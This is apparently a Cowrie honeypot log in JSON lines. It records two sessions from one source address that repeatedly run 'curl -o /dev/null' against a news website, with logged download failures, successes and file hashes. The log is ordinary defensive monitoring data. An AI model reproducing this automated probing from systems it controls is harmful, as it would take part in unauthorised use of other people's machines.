{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.035300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.051175Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.089787Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.091301Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.181344Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.183086Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.246995Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.248689Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.303643Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.306799Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.318628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.319625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.322149Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.324066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.364410Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.365262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.367128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.367901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.381390Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.382352Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.416109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.416956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.418873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.419642Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.455721Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.457097Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.462954Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.463821Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.469435Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.470554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.535247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.537107Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.546377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.547292Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.629841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.630970Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.633724Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.635065Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.678608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.679786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.716811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.717856Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.733359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.760653Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.761773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.766055Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.774446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.802432Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.803475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.831636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.856203Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.857353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.863917Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.913727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.914905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.916777Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.919139Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.958924Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.960167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.961950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:14.967188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:14.967889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.000006Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.000886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.005040Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.006567Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.008981Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.009822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.027535Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.038489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.042798Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.044344Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.051512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.053113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.057211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.058167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.118429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.119695Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.121960Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.122933Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.124476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.125804Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.160211Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.186565Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.212829Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.256397Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.337077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.338218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.342057Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.343104Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.350195Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.361877Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.384309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.385293Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.390846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.392267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.398380Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.419598Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.420642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.427327Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.428827Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.431191Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.432318Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.458691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.459858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.480238Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.481655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.561371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.563204Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.598377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.599601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:15.616143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:15.617433Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
